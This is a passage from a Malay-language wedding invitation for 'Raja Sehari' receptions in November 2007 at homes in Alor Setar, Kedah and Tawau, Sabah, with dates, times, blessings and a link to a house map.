Tuan/Puan dan Encik/Cik di jemput hadir ke majlis Raja Sehari pada 10/11/2007 bertempat di No. 12, Lorong Inai 5/1, Taman Setar, Alor Setar, Kedah Darul Aman bermula jam 12:00 tengah hari atau pada 24/11/2007 bertempat di No. 24, Kg. Air, KM7, Kg. Kinabutan Kecl, 91000 Tawau, Sabah bermula jam 7:30 malam.

3. Kehadiran TanSri/PuanSri, Dato/Datin, Rakan Taulan, Tuan/Puan dan Encik/Cik adalah sangat-sangat di alu-alukan. Semoga kehadiran dan iringan doa restu para jemputan sekeluarga akan menyerikan lagi majlis ini serta di berkati Allah SWT, Insha Allah.

Wabillahi Taufik Walhidayah,
Wassalamu Alaikum Warahmatullaahi Wabarakaatuh.

Peta rumah pengantin click di sini.